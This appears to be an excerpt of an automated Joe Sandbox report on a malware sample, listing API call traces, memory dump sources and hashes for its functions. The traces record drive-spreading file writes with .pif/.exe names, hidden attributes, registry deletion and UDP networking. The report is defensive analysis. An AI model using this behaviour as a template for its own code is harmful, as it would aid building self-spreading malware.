                                                                                                                                                                                                                                                                                              • Part of subcall function 014341C6: RtlEnterCriticalSection.NTDLL(01449030), ref: 014341D6
                                                                                                                                                                                                                                                                                              • Part of subcall function 014341C6: RtlLeaveCriticalSection.NTDLL(01449030), ref: 01434260
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00029EEA,00000000,00000000,?), ref: 014445F9
                                                                                                                                                                                                                                                                                              • Part of subcall function 014341C6: CloseHandle.KERNEL32(00000000,?,?,01441722,00000000), ref: 01434247
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0003392D,00000000,00000000,?), ref: 01444620
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00028962,00000000,00000000,?), ref: 01444647
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002A2F5,00000000,00000000,?), ref: 0144466E
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002426A,00000000,00000000,?), ref: 01444695
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00027A3A,00000000,00000000,?), ref: 014446BC
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000283C9,00000000,00000000,?), ref: 014446E3
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002878B,00000000,00000000,?), ref: 0144470A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000200), ref: 01444727
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateThread$AddressProc$CriticalSection$Initialize$LibraryLoad$CloseEnterErrorHandleLeaveModeSleepStartup
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3135310872-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 78695856b24a3b3870a7550c941d086aba9a8074139cb4e0e5b3191ba2b67db0
                                                                                                                                                                                                                                                                                            • Instruction ID: 1530387acd2be854770e0b9e681951d56c01d2f9f6e6b3267306689d6cf44e10
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78695856b24a3b3870a7550c941d086aba9a8074139cb4e0e5b3191ba2b67db0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E4100B2BD03447BF670A7E19C1BFD977289B69F01F24015AB709BD0E4DAF02644876A
                                                                                                                                                                                                                                                                                            Function 01443238 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 133filestringtimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00004E20), ref: 01443210
                                                                                                                                                                                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 01443220
                                                                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 014432A3
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01432740), ref: 014432CA
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 014432E6
                                                                                                                                                                                                                                                                                            • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0144331B
                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0144332F
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 01443391
                                                                                                                                                                                                                                                                                            • CharLowerA.USER32(?), ref: 0144339E
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014433AB
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01443479
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 01443486
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01443498
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 014434B4
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 014434E7
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 014434F4
                                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000007), ref: 01443503
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0144351C
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 01443529
                                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000020), ref: 01443547
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 01443554
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0144357F
                                                                                                                                                                                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 0144359F
                                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 014435C8
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,.pif), ref: 0144362B
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,.exe), ref: 0144363F
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 0144366B
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000), ref: 01443680
                                                                                                                                                                                                                                                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 014436A2
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 014436AF
                                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000007), ref: 014436BE
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 014436DA
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0144370D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0144371A
                                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000007), ref: 01443729
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001B58), ref: 01443739
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Time$Attributes$CloseHandle$Create$SystemWritelstrcat$Sleeplstrlen$CharDeleteDriveDrivesLogicalLowerReadTypelstrcpy
                                                                                                                                                                                                                                                                                            • String ID: :$\
                                                                                                                                                                                                                                                                                            • API String ID: 3104407473-1166558509
                                                                                                                                                                                                                                                                                            • Opcode ID: f980a8a3144dbfc7e78625a81c559bc9f1888efe3b1694d208c992cecc11f6b1
                                                                                                                                                                                                                                                                                            • Instruction ID: 996d6ecb1a785f5d8da11a09246a7bf831e91103cf9b2bea0b23319bb59dfdd4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f980a8a3144dbfc7e78625a81c559bc9f1888efe3b1694d208c992cecc11f6b1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B851B175E002689BEB35CF64CC84AEEB776BF85B01F0481DAE209E7294D7349A95CF10
                                                                                                                                                                                                                                                                                            Function 014355BE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(C:\Windows\ueqe.log,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01435637
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 01435659
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 01435691
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000400,00000000,00000000), ref: 014356BB
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,C:\Windows\ueqe.log), ref: 014356CD
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 014356E1
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 01435725
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01435755
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Global$AllocCloseCreateFreeHandleReadSizelstrcpylstrlen
                                                                                                                                                                                                                                                                                            • String ID: C:\Windows\ueqe.log
                                                                                                                                                                                                                                                                                            • API String ID: 1499523542-2585761192
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b39c3cf186ee6e9da0b32e0951ad939e7f63d9dcbc2d5850dfd9f681f4792de
                                                                                                                                                                                                                                                                                            • Instruction ID: 94b05f83f5ea027541151e26a5d3e4d8bf61e9e92dbd26f061da53e4874feea3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b39c3cf186ee6e9da0b32e0951ad939e7f63d9dcbc2d5850dfd9f681f4792de
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 414141B594021C9BDB20DB64CC8CBDAB774AB58704F1046D9E319A6291D7B45BC4CF90
                                                                                                                                                                                                                                                                                            Function 0143A553 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0143A599
                                                                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(01432114,01432660,00000000,00000000,00000080,014326C0), ref: 0143A5C5
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0143A5D2
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0143A5EA
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0143A635
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(01432114,01432660,?,014326C0), ref: 0143A65A
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(67320627207,00000000), ref: 0143A66C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountPrivateProfileStringTick$Writelstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: 67320627207
                                                                                                                                                                                                                                                                                            • API String ID: 929466507-2104150523
                                                                                                                                                                                                                                                                                            • Opcode ID: 6c1196b1faede10ac3d683d0ae19dc0ee4a6e12d1800d7fe36469872c91fcea9
                                                                                                                                                                                                                                                                                            • Instruction ID: 804d8451e3b9c4b68e4cc44573492e62d4d8e85850b07d42c7faf2fda1090639
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c1196b1faede10ac3d683d0ae19dc0ee4a6e12d1800d7fe36469872c91fcea9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61315E76600119AFDB20CB78D844BE6B7B9EB9CB00F0485A9F30993268DF755A848F50
                                                                                                                                                                                                                                                                                            Function 01438962 Relevance: 13.8, APIs: 9, Instructions: 250sleepthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0002BF20), ref: 01438A14
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 01438A33
                                                                                                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(00000110,?), ref: 01438B3E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001770), ref: 01438B8E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0001D4C0), ref: 01438BB0
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(004B001E), ref: 01438D9D
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01438DD0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$ExchangeExitInterlockedThreadUserWrite
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 702981705-0
                                                                                                                                                                                                                                                                                            • Opcode ID: de86aedc59bb26a9587ec08efa30f4a66b0cd5bae04fdba9b495b4bbece79ad1
                                                                                                                                                                                                                                                                                            • Instruction ID: 3196f1aedbd143f90ecd0ea773be87ea4c8b638d0d72023a3fa473a740b21072
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de86aedc59bb26a9587ec08efa30f4a66b0cd5bae04fdba9b495b4bbece79ad1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20B1B3B1A0021A8BDB34CB54CCD47EAB7B5BBDC304F4485EAE209A6255C7356E85CF54
                                                                                                                                                                                                                                                                                            Function 0143878B Relevance: 12.1, APIs: 8, Instructions: 83sleepthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000493E0), ref: 014387D1
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000284C1,00000000,00000000,00000000), ref: 0143885C
                                                                                                                                                                                                                                                                                              • Part of subcall function 014341C6: RtlEnterCriticalSection.NTDLL(01449030), ref: 014341D6
                                                                                                                                                                                                                                                                                              • Part of subcall function 014341C6: RtlLeaveCriticalSection.NTDLL(01449030), ref: 01434260
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000200), ref: 01438870
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000100), ref: 01438884
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000100), ref: 0143889F
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 014388BD
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00249F00), ref: 014388D7
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 014388E4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$CriticalSectionThread$CreateEnterExitLeaveUser
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 485722307-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 472cc717a78b56e6839e108968adccc54dfc7cddf7ecbc67f1f06ae15fb25f84
                                                                                                                                                                                                                                                                                            • Instruction ID: 5a5129247391c1ddd97313865dafe6653fa9d5f7b30b36b48c1333c3526d811f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 472cc717a78b56e6839e108968adccc54dfc7cddf7ecbc67f1f06ae15fb25f84
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 913108F4904205DBE7249B64EC4979AF774AB9C709F0042AAF305B62E0CBB54985CF25
                                                                                                                                                                                                                                                                                            Function 0143719B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 207networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 01437203
                                                                                                                                                                                                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0143726D
                                                                                                                                                                                                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01437345
                                                                                                                                                                                                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01437374
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 0143750D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 5924b0decf69c51d315920499ef1b2c4b1992526306c492b3e009b93be33b3c3
                                                                                                                                                                                                                                                                                            • Instruction ID: 1eb7dcaf7e5b8791618904105a6208fb9c7455049f400e745ac9aee125ac386c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5924b0decf69c51d315920499ef1b2c4b1992526306c492b3e009b93be33b3c3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 019195B0D041A99AEB34CB24DC50BEEBB75AF88311F5441DAE29DA62D0D7B06EC4CF50
                                                                                                                                                                                                                                                                                            Function 01438F51 Relevance: 10.6, APIs: 7, Instructions: 110registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(01439F2F,01432E8C,00000000,000F003F,01439F2F), ref: 01438FA0
                                                                                                                                                                                                                                                                                            • RegEnumValueA.KERNEL32(01439F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01438FD7
                                                                                                                                                                                                                                                                                            • RegDeleteValueA.KERNEL32(01439F2F,00000000), ref: 01439000
                                                                                                                                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(01439F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01439038
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0143906B
                                                                                                                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(01439F2F,00000000), ref: 01439092
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(01439F2F), ref: 014390AF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DeleteEnumValue$CloseOpenwsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2321319729-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dae3b593967fc50b20d80883f560c691baf4737450faabb24caa7e0b83098f3e
                                                                                                                                                                                                                                                                                            • Instruction ID: 6390721c1bb2b9fa5fe7fc0d7cf1b1a3cd1d0f26482122dc8984cc4f7c23432f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dae3b593967fc50b20d80883f560c691baf4737450faabb24caa7e0b83098f3e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 404142F5A00248FBDB24CFA4CC94BDEBBB9AB88704F10C199E305A7294D77497498F94
                                                                                                                                                                                                                                                                                            Function 01442EBC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82registrystringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,0143244C,00000000,000F003F,?,?), ref: 01442F03
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,01432488,00000000,00000004,00000002,00000004), ref: 01442F31
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 01442F3E
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,01432550), ref: 01442F99
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01432548), ref: 01442FAC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseOpenValuelstrcatlstrcpy
                                                                                                                                                                                                                                                                                            • String ID: >
                                                                                                                                                                                                                                                                                            • API String ID: 1115058322-325317158
                                                                                                                                                                                                                                                                                            • Opcode ID: e30e9e9d6e81c4a734e14d7790dd11107e741bc6a06cdb0d30b6e8132ebbeef0
                                                                                                                                                                                                                                                                                            • Instruction ID: eba98e3e063a73e8e2f1a1ad8189e9352baaaad0210cb50ff06b589158fb3315
